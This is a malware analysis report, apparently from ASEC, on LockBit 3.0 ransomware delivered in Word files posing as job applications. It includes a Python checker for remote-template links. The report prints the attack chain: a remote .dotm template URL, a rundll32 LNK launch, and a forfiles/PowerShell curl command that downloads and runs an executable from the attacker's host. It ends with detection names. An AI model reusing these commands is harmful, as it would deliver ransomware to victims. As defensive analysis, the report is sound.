The ASEC analysis team has identified that LockBit 3.0 ransomware, which was previously distributed in NSIS format disguised as job application emails, is now also being distributed in Word document format. The specific distribution channel has not yet been identified, but because the distributed file names include names of people, such as ‘Lim Gyu Min.docx’ and ‘Jeon Chae Rin.docx’, the files were likely distributed disguised as job applications, as in past cases.
There is an external link in the word\_rels\settings.xml.rels file inside the Word document. When the document is opened, this link causes the user PC to access hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm and download an additional dotm file.
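
A triage check for the external link described above, as an added example that is not from the ASEC report: it lists the external relationships in word/_rels/settings.xml.rels and flags a template that Word would fetch from another host. The attachedTemplate relationship type, the helper names and the sample targets are assumptions, and the sample ZIP is constructed.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
SETTINGS_RELS = "word/_rels/settings.xml.rels"  # ZIP member names use forward slashes


def external_relationships(docx_bytes, part=SETTINGS_RELS):
    """Return (type, target) for every TargetMode="External" relationship in a .rels part."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if part not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(part))
    return [
        (rel.get("Type", "").rsplit("/", 1)[-1], rel.get("Target", ""))
        for rel in root.iter(RELS_NS + "Relationship")
        if rel.get("TargetMode", "").lower() == "external"
    ]


def is_remote_template(rel):
    """True when the relationship makes Word fetch its template from another host."""
    rel_type, target = rel
    t = target.lower()
    # A locally attached template is also "External" but uses file:///C:/...
    remote = t.startswith(("http://", "https://", "\\\\")) or (
        t.startswith("file://") and not t.startswith("file:///"))
    return rel_type == "attachedTemplate" and remote


def build_sample(target):
    """Constructed test input: a ZIP with only the settings rels part (not a real sample)."""
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
        f'2006/relationships/attachedTemplate" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


if __name__ == "__main__":
    for url in ("http://template-host.example/remote.dotm", "file:///C:/Templates/cv.dotm"):
        for rel in external_relationships(build_sample(url)):
            print(rel, "-> remote template" if is_remote_template(rel) else "-> local")
```
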


The document file contains an image that prompts the use of a macro script. The downloaded dlx5rc.dotm contains a VBA macro, and when the user clicks Enable Content, the malicious macro script is executed.


The VBA macro code inside the dotm file is as follows.

The strings in the code are obfuscated, and the code uses CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8). When the VBA macro is executed, it creates a file named skeml.lnk in the C:\Users\Public\ folder. The TargetPath of the link file is forfiles.exe, and the link file is executed through rundll32.exe. The command that executes the link file is as follows.
- rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk
When the link file is executed, additional malicious files are downloaded from hxxp://ppaauuaa11232[.]cc/aaa.exe via PowerShell commands and then saved in C:\Users\Public\156498415616651651984561561658456.exe before being executed. The command executed via the LNK file is as follows.
- forfiles.exe /p c:\windows\system32 /m notepad.exe /c ""cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe"

The currently downloaded 156498415616651651984561561658456.exe file is LockBit 3.0 ransomware in NSIS form.

As LockBit ransomware is being distributed through various methods, user caution is advised. Users should update the applications and V3 they use to the latest version and refrain from opening document files from unknown sources.
[File Detection]
Downloader/DOC.External
Downloader/XML.External
Downloader/LNK.Powershell
Ransomware/Win.LockBit
[Behavior Detection]
Malware/MDP.Download.M1197
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171
[IOC Info]